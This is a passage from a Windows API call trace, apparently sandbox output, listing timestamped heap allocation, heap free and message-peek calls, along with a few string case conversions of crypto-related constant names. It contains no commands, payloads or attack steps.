hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0176.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0176.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0176.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0176.510] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0176.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0176.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0176.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0176.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0176.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0176.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0176.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0176.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0176.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0176.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0176.510] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0176.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0176.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0176.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0176.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2728 [0176.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0176.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0176.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0176.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3d8 [0176.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0176.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0176.511] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0176.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0176.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0176.511] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0176.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0176.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0176.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0176.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0176.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0176.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0176.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0176.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0176.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0176.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0176.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0176.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0176.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0176.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0176.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0176.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0176.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0176.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0176.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.512] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0176.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0176.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0176.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0176.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0176.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0176.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0176.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0176.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0176.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0176.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0176.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0176.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0176.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0176.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0176.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0176.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0176.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0176.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0176.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0176.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0176.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0176.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0176.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0176.513] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0176.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0176.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0176.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0176.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0176.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0176.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0176.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0176.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0176.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0176.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0176.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0176.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0176.514] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0176.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0176.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd768 [0176.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0176.514] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0176.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0176.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0176.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0176.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0176.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0176.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0176.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0176.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0176.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0176.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0176.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0176.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0176.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0176.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0176.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0176.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0176.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0176.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0176.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0176.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0176.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0176.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0176.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0176.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0176.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0176.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0176.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0176.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0176.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0176.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0176.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0176.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0176.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0176.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0176.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0176.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0176.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0176.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0176.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0176.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0176.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0176.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0176.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0176.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0176.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0176.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0176.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0176.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0176.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0176.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0176.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0176.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0176.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0176.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0176.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0176.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0176.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0176.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0176.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0176.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0176.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0176.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0176.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0176.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0176.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0176.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0176.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0176.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0176.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0176.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0176.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0176.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0176.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0176.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0176.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0176.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0176.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0176.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0176.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0176.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0176.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0176.518] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0176.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0176.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 